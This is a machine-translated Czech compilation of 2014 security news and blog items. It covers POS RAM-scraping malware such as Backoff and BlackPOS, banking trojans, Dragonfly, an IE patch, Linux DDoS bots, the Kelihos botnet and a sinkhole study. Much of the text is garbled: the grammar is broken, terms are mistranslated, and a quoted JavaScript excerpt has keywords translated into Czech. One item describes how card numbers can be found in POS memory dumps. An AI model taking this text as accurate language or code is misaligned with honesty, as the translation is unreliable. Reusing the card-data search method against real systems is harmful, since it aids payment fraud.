Malware trendy naznačují, že zločinci se stěhuje z těžby botnety a bazény k přímější peněženku krádeže a výměny pověření unese. Neefektivní těžby trojské koně pracují na mobilních zařízeních prokázala, že přístup k finančním prostředkům uloženým v digitálním peněžence oběti může být mnohem jednodušší, než uvedení úsilí do budování masivní síť horníků, které sklízejí minimální zisky.
Debetní karty spojené s Bitcoin peněženky se začínají objevovat, a to přináší další lákavou vstupní bod pro zločince. S "bitwashing" služby stále častější, sledování odcizených finančních prostředků se ukáže mnohem obtížnější v budoucnu vystavovat skutečnou anonymní povahu cryptocurrencies.
Jakmile volby de facto pro překupníky drog a ilegální trhy, Bitcoin se snaží získat globální důvěru ostatních obchodníků, doufám, že to bude mít hotový společenství podporovat ji, když se stane výchozím standardem pro on-line i off-line transakcí. Můžete si přečíst celý dokument předložený na Virus Bulletin zde .
Doporučené postupy pro prevenci skimming 24.9.2014 Viry Bezpečnostní standardy Rada PCI vydala aktualizaci pro své pokyny pro obchodníky na ochranu proti karet skimming útoky v prostředích POS.
Karta skimming nadále vysoce ziskový podnik pro zločince, se Tajná služba Spojených států odhaduje, že náklady na spotřebitele a podniky alespoň 8000000000 dolarů ročně. Přestože obyčejně spojené s externími elektronickými zařízeními umístěnými na bankomatech, skimming může ohrozit mnoho různých platebních forem, včetně, POS terminály, bezdrátové síťové technologie, jako je Bluetooth a Wi-Fi připojení na internet a dokonce i EMV čipových karet. Díky pokroku v oblasti platebního technologií a nových technik skimming, obchodníci především i nadále v ohrožení. V reakci na tuto potřebu, Rada tvořil průmysl pracovní skupinu, aby aktualizovala své pokyny pro skimming oslovit širokou škálu společných cílech a nových vektorů útoku, včetně : sběr dat z malware a paměti škrabky nebo ohrožení softwaru; překryvné útoky, které využívají pokrok v 3D tiskárny; . mobilní nedostatky a útoky zařízení proti EMV čipových karet Bezpečnostní nejlepší praxe: Identifikujte rizika spojená s skimming - a to jak fyzické a logické bázi. Vyhodnotit a porozumět zranitelnosti vyplývajících z použití POS terminálů a terminálů infrastruktury, a které jsou spojeny s pracovníky, kteří mají přístup k platební prostředky spotřebitelů. předejít nebo zabránit trestné útoky proti POS terminálů a terminálů infrastruktury. Uveďte narušit svorky co nejdříve a oznámí příslušné agentury reagovat a minimalizovat dopad úspěšného útoku. Organizace mohou také odkazovat příloh v dokumentu k posouzení rizika zranitelnosti, a v jejich úsilí o splnění požadavku PCI DSS 9,9 pro zajištění řádného kontrolu zařízení POS a omezení útoku vektor zavedením jednoduché každodenní rutiny a školení zaměstnanců. "Odstřeďování je vysoce zisková a apeluje na širokou škálu zločinců, protože umožňuje je zachytit obrovské množství dat v krátkém čase, s nízkým rizikem odhalení, "řekl Troy Leach, CTO, PCI SSC. "Maloobchodníci a další organizace mohou využít těchto pokynů se vzdělávat o tom, jak rozpoznat a bránit proti tomuto typu útoku."
Vše, co potřebujete vědět o POS malware 22.9.2014 Viry S letošní dramatické uptick v narušení bezpečnosti osobních údajů cílení maloobchodníky a restaurací řetězce a, konkrétněji, údaje platební karty, kterou zpracovávají každý den, je to bezpečné říci, že pro tuto chvíli, počítačoví podvodníci pocit, že našli husu, která snáší zlatá vejce . Target , PF Chang je , Home Depot , a pravděpodobně řada menších maloobchodníků byly zasaženy hackery, kteří mohou nebo nemusí být součástí stejné skupiny, ale tato porušení všechny mají jedno společné: jsou útočníci použili PoS RAM škrábání malware shromažďovat data z karty, dokud je ještě v nezašifrované podobě. Vzestup POS RAM škrabky v podobě vidíme dnes zahájen koncem roku 2011, kdy Rdasrv malware se stala dobrou alternativou k dříve používané ladění nástrojů, které dumpingové stopy 1 a 2 kredity dat z karty z RAM. Teprve o rok později, tři nové a odlišné POS RAM škrabky na povrch. V roce 2014 byly zjištěny tolik jako šest nových škrabky: JackPOS, Decebel, Soraya, BrutPOS, odmlce , a nové a účinnější verze BlackPOS . Jejich hlavním cílem je sběr dat a exfiltrate ji na místo, kde útočníci mohou vyzvednout, a zvládneme to a podívejte se pod radarem společností tím, že zaměstná celou řadu technik a funkcí: více složek; sítí, bot a zabít funkce přepínačů; více průsaků techniky; šifrování. Skutečnost, že existují vývojové kity tam, že umožňuje komukoliv vytvořit vlastní binárky porušují systémy obětí je dalším faktorem úspěchu. Numaan Huq, vedoucí vědecký pracovník hrozba Trend Micro, nedávno dokončil rozsáhlou zprávu o POS RAM škrabky, ve kterém všiml si minulost, se ponořil do současnosti, a dělal odborný odhad o budoucnosti tohoto konkrétního typu malware. Tato zpráva by měla být musí-číst pro každého, kdo má za úkol chránit pokladní systémy, jak to také vysvětluje metody infekce často používá cyber podvodníci šířit tento typ malware, a poskytuje dobrý přehled o nových technologií a změn ve zpracování plateb ekosystému kreditních karet, stejně jako nové trendy v přístupu Cyber podvodníci. V neposlední řadě Huq nabízí také řadu konkrétních tipů - hardware, software a politika založená -, která by měla výrazně snížit útoku a rizika každá společnost, která se zabývá platebními kartami zákazníků v současné době čelí.
Dragonfly malware cílení farmaceutických společností 22.9.2014 Viry Nedávno odhalil Dragonfly (HAVEX) malware pravděpodobně zaměřuje na farmaceutický sektor, nikoli odvětví energetiky stejně jako předtím věřil, podle Belden.
Až do teď, pokročilé kybernetickými útoky proti průmyslu se zaměřením na kritické energetiky a chemických. Manažerské týmy Výroba se doporučuje, aby aktualizovali své hodnocení rizik, a zajistily, že jejich kybernetické bezpečnosti obrana vydrží to, co je jasně vysoce koordinované útoky týmy profesionálních hackerů. Během několika posledních let, průmyslová infrastruktura byla identifikována jako klíčový cíl pro hackery a vlády -sponsored válčení přitahuje některé z nejvíce sofistikovaných kybernetických útoků na záznamu, včetně Stuxnet, Flame a Duqu. Dragonfly je významná, protože je to první z vyspělých útoků od Stuxnet mít užitečné zatížení, které se zaměřují na specifické komponenty ICS. Vzhledem k významu tohoto zjištění, Belden pověřen Joel Langill z RedHat Cyber, přední nezávislý bezpečnostní expert ICS, výzkumu Dragonfly více hloubka. Cílem bylo pochopit kampaň Dragonfly s cílem poskytnout co nejlepší poradenství pro zákazníky, pro obranu proti pokročilé malware hrozby. Langill je přezkum Dragonfly zaměřena na provádění škodlivý kód na systémech, které odrážely skutečné konfigurace ICS a sledování dopadu malware. Tři hlavní faktory, které ho vedlo k domněnce, že cíl je duševním vlastnictvím farmaceutických organizací: 1. Z tisíce možných dodavatelů ICS, tři společnosti zaměřené na trojanized software nebyl primární dodavatelé "energie" zařízení. Místo toho, všechny tři nabízené produkty a služby nejčastěji používají ve farmaceutickém průmyslu. 2. Útok Dragonfly je velmi podobný charakter jako jiné kampaně s názvem Epic Turla a je pravděpodobné, řízen stejným týmem. Epic Turla bylo prokázáno, že byly zaměřeny na duševní vlastnictví farmaceutických společností. 3. Dragonfly malware obsahovala Industrial Protocol Scanner modul, který vyhledával zařízení na portech TCP 44818 (Omron, Rockwell Automation), 102 (Siemens) a 502 (Schneider Electric). Tyto protokoly a produkty mají vyšší instalovaný základnu v balení a výrobních aplikacích obvykle nacházejí v oblasti spotřební balené zboží odvětví, jako spíše než k farmaceutickému odvětví energetiky. "Můj výzkum, spojený s mou znalostí farmaceutického průmyslu, mě vedly k závěru, že to bylo cílem Dragonfly, "poznamenal Langill. "Potenciální škoda by mohla zahrnovat krádež proprietárních receptů a výrobní šarže sekvence kroků, jakož i informace o síti a zařízení, které označují výrobní objemy a schopnosti rostlin."
Dokonce i Bad Malware práce 16.9.2014 Viry Za pár týdny, jsem se dostáváte několik "Delta Ticket" e-mailů denně, s kapsami na spustitelné soubory jako přílohy. E-maily jsou dělány asi tak zlé, jak to dostane:
"Z" adresa používá doménu náhodného E-mail nepoužívá typický "Delta" Formátování / značky. Příloha je přímo spustitelný, jen zip. Antivirus je v pořádku, na novém vzorku, obdrželi právě teď (8/55 v závislosti na VirusTotal) a excelentní (> 30/55), u starších vzorků. [1] E-mail (Informace o letu) je velmi specifická a nezdá se být upraven tak, aby odesílateli Delta neposílá lístky jako příloh, jako je tento. Fake Delta Ticket e-mail
Tak oni mohli udělat mnohem lépe. Smutné na tom je, že zřejmě nemají potřebu dělat lépe.
"Z" název, který je to, co většina lidí při pohledu na, čte "Delta Air Lines". Některé hlavní / populární AV nástroje stále nemají detekovat vůbec dobře, a dobře, uživatel chce kliknout na věci myslím.
Počáteční kus malware se zdá být obecný downloader. V mém systému nainstalován, co vypadalo jako falešné Adobe aktualizace. Stále běží, aby zjistili, co se přesně děje, ale nečekal moc.
Salesforce varuje zákazníky před novým trojským koněm
11.9.2014 Viry Na uživatele Salesforce.com se zaměřuje nová verze trojského koně, která doposud cílila hlavně na internetové bankovnictví velkých finančních institucí.
Nový trojský kůň se jmenuje Dyre nebo Dyreza a objevil se v červnu. Stejně jako většina trojských koní zaměřujících se na internetové bankovnictví, i tento se snaží o napojení do procesů webového prohlížeče tak, aby zachytil vložené přihlašovací údaje uživatele. Původní verze Dyre nalezená v červnu výzkumníky z PhishMe a CSIS Security Group se zaměřovala na stránky Bank of America, NatWest, Citibank, RBS a Ulsterbank. Tvůrci červa však na tento seznam nyní přidali i Salesforce.com.
„3. září 2014 jeden z našich bezpečnostních partnerů zjistil, že červ Dyre (známý také jako Dyreza), který se typicky zaměřuje na uživatele velkých a známých finančních institucí, může cílit také na uživatele Salesforce,“ uvedlo Salesforce v prohlášení na svých webových stránkách.
„V současné době nemáme žádný důkaz o tom, že tímto červem byl kdokoli z našich uživatelů postižen, avšak pokračujeme ve vyšetřování,“ dodala společnost. „Pokud zjistíme, že byl tímto červem nějaký uživatel napaden, spojíme se s ním a pomůžeme mu s provedením potřebných bezpečnostních opatření.“ Salesforce doporučuje, aby jeho uživatelé používali jím nabízenou funkci, která umožní přístup k jejich účtům pouze z prověřených korporátních sítí a VPN. Doporučeno je také zapnutí dvoufázového přihlašování pomocí mobilní aplikace Salesforce 1 a zapnutí upozornění na pokusy o přihlášení z neznámých počítačů pomocí SMS. Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Dyreza není prvním červem, který se na Salesforce zaměřuje. V únoru tohoto roku výzkumníci z bezpečnostní společnosti Adallom objevili variantu známého trojského koně Zeus, jež byla upravena tak, aby stahovala firemní data z napadených účtů Salesforce.
„Toto upozornění je jen dalším budíčkem v řadě pro uživatele SaaS (Software-as-a-Service), kteří si musí uvědomit, že nemohou v otázkách zabezpečení dat spoléhat pouze na poskytovatele SaaS,“ uvedl Adallom nyní v reakci na oficiální prohlášení Salesforce. „Z pohledu Salesforce.com se nejedná o zranitelnost přímo v jeho službě, jelikož červ musí nejprve infikovat systém uživatele. Tudíž za krádež či smazání dat je z pohledu Salesforce zodpovědný pouze napadený uživatel.“
EMET, AV Zveřejnění Leak Napájen ze sítě IE 10.9.2014 Viry
Provoz Sněhulák špionáž kampaň , který zamířil na vojenskou inteligenci v letošním roce přes Internet Explorer nulové den, odhalil slabinu v úsilí managementu zranitelnosti Microsoft. Co bylo jedinečné o provozu sněhulák je to, že v ceně kontrolu, zda je ohrožena počítač běžel Microsoft Enhanced Experience Toolkit (zmírnění Emet) , a pokud ano, tak by útok neprovede.
Jak se ukázalo, byli útočníci využívají informační zveřejnění chyby, které odhalil, zda EMET a jiné antimalware ochrany jsou aktivní. Dnes Microsoft podnikl kroky k uzavření této mezery ve své nejnovější kumulativní aktualizace pro Internet Explorer.
Kritická záplata je jedním ze čtyř dnes zveřejnila společnost Microsoft v rámci své měsíční Patch Tuesday bulletinů zabezpečení . IE aktualizace záplaty 37 zranitelných míst, včetně veřejně známých zveřejnění chyby. Zbývající tři bulletiny NET, Plánovač úloh systému Windows a Microsoft Lync, byly hodnoceny důležité společností Microsoft a pravděpodobně nemají vést ke vzdálenému spuštění kódu.
EMET je bezplatná sada nástrojů poskytované společností Microsoft, že středně velké a podnikové IT obchody nasadit jako dočasné provizorium pro zero-day zranitelnosti se využívá ve volné přírodě. Tato sada nástrojů poskytuje celou řadu využití snižující závažnost rizika, které chrání proti běžné paměťové zranitelnosti korupce. Zranitelnost oprava v IE umožní zdroje načten do paměti, které budou dotazovány, řekl Microsoft, čímž útočníkovi hlava je jako to, co ochrany běží na počítači.
IE patch MS14-052 , je nejvyšší prioritou bulletin pro IT obchodů v tomto měsíci, odborníci tvrdili.
"Tato oprava je Microsoft pokus omezit schopnost využít stavebnice, které byly identifikovány jako pomocí zpřístupnění informací techniku k určení, zda byly nainstalovány zejména bezpečnostní software," řekl Craig Young, bezpečnostní výzkumník Tripwire. "Chyba umožní škodlivý webové stránky a zjistěte, zda je balík nainstalován software dotazem na dostupnost knihovny DLL, které tento software. Informace o aktivních bezpečnostních produktů na cíl je velmi užitečné pro útočníka; že jim umožňuje, aby se zabránilo zvyšování alarmy zasláním detekovatelné užitečné zatížení. "
Tato aktualizace také záplaty zranitelnosti v prohlížeči, se vrací do IE6 se systémem Windows Server prostřednictvím aktuální verze.
Další bulletin stojí za to sledovat, odborníci tvrdili, je MS14-054 , zvýšení úrovně oprávnění zabezpečení v Plánovači úloh. Aby bylo možné využít chybu, útočník by musel mít platná pověření a lokální přístup do postiženého systému, aby bylo možné řídit jejich využívání.
Tato chyba ovlivňuje Windows 8, Windows 8.1, Windows RT a Windows RT 8.1, stejně jako Windows Server 2012 a Windows Server 2012 R2.
"MS14-054 by měla být také vysoko na IT administrátoři seznam oprav jako Microsoft očekává, že spolehlivé Plánovač úloh využije vyvinutých v rámci jednoho měsíce," řekl Young. "Úspěšné zneužití této chyby zabezpečení by umožnil každému uživateli získat úplnou kontrolu nad postiženým systémem."
Microsoft také oprava zranitelnosti denial-of-service v jeho rámci NET. MS14-053 postihuje většinu verzí NET, a také ovlivňuje instalace ASP.NET, pokud je to povoleno v IIS.
"Zůstane-li unpatched, dálkové un-ověřen útočníci mohou posílat HTTP / HTTPS požadavek způsobit vyčerpání zdrojů, což v konečném důsledku povede k řešení-of-service stav na webovém serveru ASP.NET," řekl Amol Sarwate, ředitel zranitelnosti laboratoří na Qualys .
Konečný bulletin, MS14-055 , nášivky tři denial-of-service zranitelná místa poštovního serveru Microsoft Lync,.
"Tato aktualizace zabezpečení řeší chyby zabezpečení opravou způsobu Lync Server dezinfikuje vstup od uživatele a opravou cestu Lync Server zpracovává výjimky a null dereferences," uvedl Microsoft ve svém zpravodaji.
Microsoft také aktualizován tři potenciální bezpečnostní rizika upozorňováni dnes:
Poradní 2871997 aktualizace ochrana pověření a ovládací prvky ověřování domény pro systém Windows 7 a Windows Server 2008 R2. Tato aktualizace zajišťuje pověření jsou vyčištěna okamžitě, a nikoli v případě, že byly získány nové Kerberos TGT lístek. Poradní 2905247 je aktualizace pro aplikaci Microsoft ASP.NET, že záplaty zvýšení úrovně oprávnění chybu ve stavu zobrazení ASP.NET, že jí byly poskytnuty v prosinci loňského roku. Jako dnešní aktualizace, aktualizace zabezpečení k dispozici prostřednictvím webu Microsoft Update kromě Download-Center-pouze možnosti stanovené v prosinci. Poradní 2755801 je aktualizace pro aplikaci Adobe Flash Player ve verzi Internet Explorer s operačním systémem Windows 8 a Windows 8.1. Dnešní aktualizace je určena pro IE 10 na Windows 8, Windows Server 2012 a Windows RT, a IE 11 na Windows 8.1, Windows Server 2012 R2 a Windows RT 8.1. - See more at: http://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175#sthash.GZPGW5Y5.dpuf
Česká spořitelna varovala před virem, který lidem vysává peníze z účtu
7.9.2014 Phishing | Viry Na pozoru by se měli mít klienti České spořitelny. Jak upozornili zástupci banky, internetem koluje nový sofistikovaný počítačový virus, díky kterému se kybernetičtí zločinci dostanou na cizí účty. Problém jim nečiní ani zabezpečení transakcí prostřednictvím SMS zpráv. „Počítač, který je napaden tímto virem, po přihlášení do internetového bankovnictví nabádá k instalaci bezpečnostní aplikace ‚OTPdirekt‘ do mobilních telefonů. Jde o podvodnou aplikaci, díky které se útočník snaží z napadeného mobilního telefonu získávat SMS zprávy včetně zpráv pro potvrzování transakcí,“ varovali zástupci České spořitelny.
Obrazovka s výzvou k instalaci bezpečnostní aplikace skutečně vypadá jako služba Servis24, je plně lokalizována do češtiny a obsahuje jen drobné pravopisné chyby. Uživatelé si tak snadno mohou virus splést se skutečným internetovým bankovnictvím spořitelny.
Podoba podvodné obrazovky nabízející instalaci bezpečnostní aplikace.
„Česká spořitelna podobnou bezpečnostní aplikaci v žádném případě nenabízí. Buďte obezřetní při používání vašeho internetového bankovnictví i mobilního telefonu. Jestliže se vám v internetovém bankovnictví nebo v mobilu nabídne instalace bezpečnostní mobilní aplikace, případně její aktivace, nereagujte na zobrazenou výzvu a neprovádějte instalaci nabízené aplikace do vašeho mobilního telefonu,“ doporučili zástupci banky.
Podobné triky zkouší kyberzločinci pravidelně Na Českou spořitelnu se kvůli početné základně klientů zaměřují počítačoví piráti pravidelně. Na přelomu července a srpna se snažili například vylákat pomocí viru informace o platebních kartách.
Ukázka podvodné stránky 3D Secure
„Po přihlášení k vašemu účtu se může zobrazit informační okno (viz obrázek výše), které vybízí k zadání CVV2/CVC2 kódu k vaší platební kartě pod záminkou aktivace služby 3D Secure. Česká spořitelna po klientech nikdy nepožaduje zadávání bezpečnostního CVV2/CVC2 kódu. Ten může být vyžadován pouze internetovým obchodníkem při platbě přes platební bránu,“ stojí ve varování České spořitelny.
„Službu 3D Secure klientům sice nabízíme, ovšem nabídka registrace v žádném okně samovolně nevyskakuje, klient si musí o aktivaci služby požádat sám,“ uzavřeli zástupci banky. Skutečnou podobu obrazovky s aktivací služby 3D Secure najdete na obrázku níže.
Pokud uživatelé zaznamenali neobvyklé chování služby Servis 24, mohou se obrátit na bezplatnou informační linku České spořitelny 800 207 207.
Linux infiltrovali a kontrolované v DDoS botnet 6.9.2014 Viry | BotNet Akamai Technologies upozornění podniky k ohrožení vysokým rizikem iptables a infekcí IptabLex na linuxových systémech. Škodlivé aktéři mohou používat infikovaných systémů Linux zahájit DDoS útoky proti zábavním průmyslu a dalších vertikál. masivní zamoření iptables a IptabLex zdá se, že byl dán velký počet linuxových webových serverů, které jsou ohroženy, a to především využije Apache Struts , Tomcat a ElasticSearch zranitelnosti. Útočníci použili zranitelnost Linux na neudržovaných serverů, abyste získali přístup, stupňovat oprávnění umožňuje vzdálené ovládání počítače, a poté pokles škodlivý kód do systému a spusťte jej. Výsledkem je, že systém by mohl pak být řízen dálkově jako součást DDoS botnet. indikace po infekci je užitečné zatížení pojmenované .IptabLes nebo. IptabLex umístěn v adresáři / boot. Tyto soubory skriptu spustit .IptabLes binární na restartování. malware obsahuje také funkci self-aktualizační která způsobí, že infikovaný systém pro kontaktování vzdáleného hostitele ke stažení souboru. V laboratorním prostředí, infikovaný systém se pokusil kontaktovat dvě IP adresy v Asii. "jsme vystopovat jeden z nejvýznamnějších DDoS útoku kampaně v roce 2014 s infekcí iptables a IptabLex malware na systémech Linux," řekl Stuart Scholly, senior VP a GM, Security Business Unit, Akamai. "Jedná se o významný rozvoj kybernetické bezpečnosti, protože operační systém Linux není běžně používán v DDoS botnetů. Škodlivé herci využili známých zranitelností v unpatched softwaru Linux zahájit DDoS útoky. Linux administrátoři potřebují vědět o této hrozbě přijmout opatření na ochranu svých serverů, "dodal Scholly. Asie zřejmě významným zdrojem DDoS útoky řídicích a kontrolních středisek (C2, CC) pro iptables a IptabLex se v současné době nachází v Asii. Infikované systémy byly zpočátku známo, že v Asii; Nicméně, v poslední době mnoho infekcí byly pozorovány na serverech hostované v USA a v jiných oblastech. V minulosti, většina infekcí DDoS bot pochází z Ruska, ale teď Asie se zdá být významným zdrojem rozvoje DDoS. Kompletní poradenství je k dispozici zde (nutná registrace).
Hlavu do oprátky: Operátoři botnetu Kelihos úspěšně rekrutují dobrovolníky
2.9.2014 Viry Uživatelé počítačů – typicky jde o Rusy - si nechají zavirovat počítač, aby se mohli přidat k údajnému útoku na vládní instituce zemí, které se podílejí na sankcích vůči Rusku. Botnet Kelihos tak neustále roste. V Rusku a na Ukrajině probíhají spamové kampaně, slibující uživatelům počítačů možnost účastnit se na tzv. DDoS útocích (spočívající v zahlcení cílových serverů nezvladatelnou vlnou dotazů) na západní vládní instituce. Zprávu o tom přinesla informační služba IDG News Service.
Aktuální nábor ve skutečnosti představuje elegantní formu rozšiřování botnetu zvaného Kelihos. Jde o síť ovládaných počítačů budovanou již od roku 2010; cílem operátorů však není bojovat za vznešené ideály, nýbrž vydělávat peníze.
Botnet, který se vyznačuje velmi odolnou strukturou (má tzv. peer-to-peer topologii, kde každý počítač je schopen ovládat ostatní počítače v síti) se ve své minulosti podílel na masovém rozesílání spamu nebo těžbě i krádežích bitcoinů. Nadšenci, kteří by chtěli alespoň na internetu bojovat za Rusko, místo toho budou bojovat za zisky kyberzločinců.
Operátoři botnetu Kelihos těží z toho, že dobrovolnické DDoS útoky v Rusku v minulosti opravdu probíhaly, například během Rusko - Gruzínského konfliktu v roce 2008.
Sinkholing na Backoff POS Trojan
1.9.2014 Viry
V současné době je hodně brnknout o Backoff point-of-prodej Trojan, který je navržen tak, aby krást informace o kreditní kartě z počítačů, které mají platební terminály připojené.
Trustwave SpiderLab, který původně objevil tento malware, vykázala velmi důkladnou analýzu v červenci. US Secret Service, ve spolupráci s DHS, navázal s poradenstvím .
Ačkoli velmi důkladná, stávající veřejná analýzy Backoff chybí velmi relevantní informaci: (C & C) servery příkaz a kontroluj. Nicméně, pokud máte přístup ke vzorkům není těžké získat tuto informaci. Na konci tohoto dokumentu naleznete úplný seznam spolu s dalšími IOCs (ukazatele kompromisu).
backoffc2
Backoff malware konfigurace s C & Cs
Sinkholed jsme dva servery C & C, které ke komunikaci se svými pány Backoff vzorky použité. Tyto servery C & C jsou používány některé vzorky, které byly převzaty z leden-březen 2014 V minulých dnech jsme zaznamenali více než 100 obětí v několika zemích s připojením k jámě.
Statistika:
backoffc2
Tam bylo několik zajímavých obětí mezi nimi:
Globální nákladní dopravu a dopravní logistiky společnost se sídlem v Severní Americe. UK-založené charitativní organizace, která poskytuje podporu, rady a informace o místních dobrovolných organizací a komunitních skupin. Mzdy sdružení v Severní Americe. Státní ústav spojen s informační technologie a komunikace ve východní Evropě. Likér obchodní řetězec v USA ISP v Alabamě, USA Se sídlem v USA mexické potravinového řetězce. Společnost, která vlastní a spravuje kancelářské budovy v Kalifornii, USA Kanadská společnost, která vlastní a provozuje masivní řetěz restaurací. Existuje také mnoho domácích uživatelů linek, především v USA a Kanadě, připojení k jámě. Toto je třeba očekávat tolik menší podniky obvykle mají tendenci běžet ty, spíše než specializované firemní připojení.
Závěry
Úspěch Backoff barvy velmi smutný obraz o stavu point-of-prodej cenného papíru. Naše závrt pokrývá méně než 5% z C & C kanály a sinkholed domény platí pouze pro některé vzorky Backoff, které byly vytvořeny v prvním čtvrtletí tohoto roku. Přesto jsme viděli více než 85 obětí připojením k našemu závrtu.
Většina z těchto obětí se nachází v Severní Americe, a některé z nich jsou vysoký profil. S přihlédnutím k vyjádření US Secret Service, je to docela sázka na jistotu, že počet infekcí Backoff na podniky v Severní Americe je také na sever od 1000.
Od svého vystoupení v loňském roce, Backoff se nijak dramaticky změnila. Autor vytvořil oba non-zatemnil a popletl vzorky. Toto bylo pravděpodobně provedeno porazit bezpečnostní kontroly na cílových sítí. Nicméně, obrana běžící na terminálu POS a / nebo sítě by neměla být dotčena. To vypovídá o současném stavu PoS bezpečnosti a další zločinci si jisti, že vzali na vědomí.
Je to velmi jasné, že POS sítě jsou hlavními cíle pro útoky škodlivého softwaru. To platí zejména v USA, který ještě nepodporuje EMV čipové s podporou karet . Na rozdíl od magnetických proužků, EMV čipy na kreditní karty nelze snadno klonovat, což je odolnější. Bohužel, USA přijímá čip a podpis, spíše než čip a PIN. Toto účinně popírá některé z přidané zabezpečení EMV může přinést.
To může být další nákladné chybu. Nepřijetí EMV spolu se zbytkem světa je opravdu znepokojující maloobchod v USA a situace se pravděpodobně v dohledné době nezmění.
1.9.2014 Viry Počet systémů zasažených malwarem Backoff může být podle Kaspersky Labs výrazně vyšší, než se původně předpokládalo.
Výzkumníkům z Kaspersky Labs se podařilo zachytit komunikaci mezi systémy infikovanými malwarem Backoff a dvojicí serverů, které kyberzločinci používali pro ovládání malwaru.
V rozpětí pouhých několika dnů výzkumníci objevili více než 100 systémů s 85 různými adresami IP snažících se připojit ke škodlivým řídícím serverům. 68 z těchto infikovaných systémů se nacházelo na území USA a dalších 28 v Kanadě. Výzkumníci malware Backoff identifikovali také na několika systémech ve Velké Británii nebo Izraeli.
Backoff je trojský kůň speciálně navržený pro získávání dat z kreditních a debetních karet z prodejních systémů v obchodech (POS). V oběhu je již od loňského října, ale před antivirovými nástroji se skrýval až do letošního srpna.
Na seznamu uživatelů infikovaných systémů lze nalézt americkou společnost zabývající se globální nákladní dopravou, americký řetězec s alkoholickými nápoji či řetězec s mexickým jídlem.
Většina z nalezených systémů byla identifikována již před několika měsíci. U některých systémů výzkumníci narazili na původní verzi malwaru z října 2013. Podle výzkumníků je tak pravděpodobné, že řada firem byla v ohrožení po dobu jednoho roku či ještě déle.
Škodlivé servery, které objevili pracovníci Kaspersky Labs, představují pouhých 5 % z celkového množství řídících serverů, kterými útočníci disponují. Takto malý vzorek vede výzkumníky k závěru, že počet infikovaných systémů bude jen v Severní Americe výrazně převyšovat hodnotu 1 000.
Falešně pozitivní nebo ne? Obtížné analyzovat Javascript
29.8.2014 Viry
Náš čtenář Travis nám poslal následující zprávu:
Měli jsme 2 uživatelů dnes ráno zasáhla stránku Forbes: hxxp: //www.forbes.com/sites/jimblasingame/2013/05/07/success-nebo-achievement/ a pak po bytí odkazovalo se odtud na: hxxp: / /ml314.com/tag.aspx?2772014 Jsou započtení naše webové spotřebiče FireEye. Je radí, že je to "Infekce Match", který nejsem zcela obeznámen s jejich stanovení systémů, protože je poměrně nová pro nás. I zavolal zdroj odkazu šli do a lze tvrdí, že i pokud by se to líbí, ale já jsem měl možnost podívat se na to ještě jen zkrášlil ji a zachránil ji.
Šel jsem dopředu a stáhli "ml314.com" URL pomocí wget, a to, co se vrátí je silně zatemnil Javascript. Já jsem jen citoval některé výňatky z ní níže:
(Function () {var g = window.document, var h = []; var e = []; var f = (g.readyState == "kompletní" || g.readyState == "naložený" || g .readyState == "interaktivní"); var d = null;! var j = function (k) {try {k.apply (tento, e)} catch (l) {if (d == null) {d.call (to, l)}}}; var ... Funkce f (o) {o.preventDefault (); o.stopPropagation ()} function i (o) {if (g) {return ... Try {s = new
Stručně řečeno: Velmi popletl (ne jen "minimalizovat"), a mnoho klíčových slov, které odkazují na zjištění verze pluginu. Něco, co by se jistě najde v průměru využít sadu. Ale celkově to nebylo úplně "sčítat". Nemít spoustu času, běžel jsem přes pár Javascript de-obfuskátory bez velkého štěstí. Doména "ml314.com" také vypadal trochu "divné", ale umožňuje vidět, kdy byla zapsána:
$ Whois ml314.com ??
Domain Name: ML314.COM Name Server: NS.RACKSPACE.COM Name Server: NS2.RACKSPACE.COM Aktualizováno Date: 22-Apr-2013 Datum vytvoření: 22-Apr-2013 Platnost do: 22-Apr-2018
?? Správce Organizace: Madison Logic správce Ulice: 257 Park Ave South správce Ulice: 5. patro
Doménové jméno není nic nového, a hostil v tom, co bych nazval "slušné" čtvrti na internetu. Informace majitel nevypadá úplně falešný, a skutečně nám dává trochu více informací k vyřešení puzzle. Ukazuje se, že "Madison Logic" je ve webovém inzerát / proklikat podnikání, takže to, co vidíte, je pravděpodobné, že jejich vlastní Javascript sledovat uživatele lépe.
Na konci, říkám to "falešně pozitivní", ale na druhou stranu, klidně mě opravte. To je jen jeden z příkladů, jak někdy věci nejsou jednoduché, "černá / bílá", pokud jde o podivnou Javascript.
One More Day of trolling v POS paměti 28.8.2014 Viry
V návaznosti na nedávný článek o paměti trolling pro PCI dat, jsem byl schopen strávit jeden den rybolovu v paměti, kopal jsem trochu hlouběji, a přijít s další zábavnou kreditní karty / Memory dobroty s naším přítelem prodejním místě aplikace.
Za prvé, jen hledají čísla kreditních karet vrátí hodně duplikátů, jak je uvedeno ve včerejším příběhu. V aplikaci stanice a POS jsem pracoval s, se ukazuje, že pokud hledáte číslo karty řetězce a navíc slova "Schváleno", jeden řádek byl vrácen na transakce s kreditní kartou a PIN. Chcete-li například najít všechny transakce Visa karty (jeden záznam za transakci):
Kromě toho se mi podařilo najít několik set čísel debetních karet, jednoduše pomocí týchž hledání konceptu, ale používat termín "Interac" místo. Všimněte si, že toto hledání dostane vás oba schválené a neschválené transakce.
S tím udělal, začal jsem hledat na duplicitních dat, a uvědomil si, že některé z duplicitních záznamů "" Byl jsem hodil ven podíval zajímavý - druh XML-jako. Při bližším zkoumání se ukázalo, že byly plně zformovaná příspěvky MS SQL (a ne, stejně jako čísla kreditních karet se, nebudu sdílet text některého z těch)
Zajímavé je, že SQL pošta formátování čísla kreditních karet jako 123456 ****** 1234, takže první 6 a poslední čtyři číslice jsou ve formátu prostého textu, ale prostřední číslice jsou zamaskována.
Tyto linky krok s PCI 2.0 specifikace, oddíl 3.3, což znamená, že pokud se maska PAN (číslo primárního účtu) tímto způsobem, to je již považován za citlivý. (Https://www.pcisecuritystandards.org/documents/pci_dss_v2.pdf). Nejsem si jistý, jak velký zájem, že jsem na 3,3 - - Vidím, že ukládání těchto informací umožňuje kupec využít to jako "pseudo zákaznické číslo", tak, aby mohli sledovat opakované nákupy a tak dále, ale já nejsem Ujistěte se, že výhody převažují nad riziky v tomto případě. Já bych mnohem raději šifrování na čtenáři samotném, aby obchodník a POS software nikdy nevidí číslo karty vůbec - je to šifrovaná ze čtečky do platební procesor (nebo brány).
Jak jsem řekl, když jsem to začal, já nejsem expert paměti řezbář, že někteří z našich čtenářů jsou - prosím, použijte náš komentář sekci a řekněte nám, co zajímavého jste našli v paměti obraz!
Tajná služba varuje před 1000 Firmy hit backoff PoS Malware 28.8.2014 Viry Point-of-sale malware je problém, který zřejmě nebude dál v dohledné době.
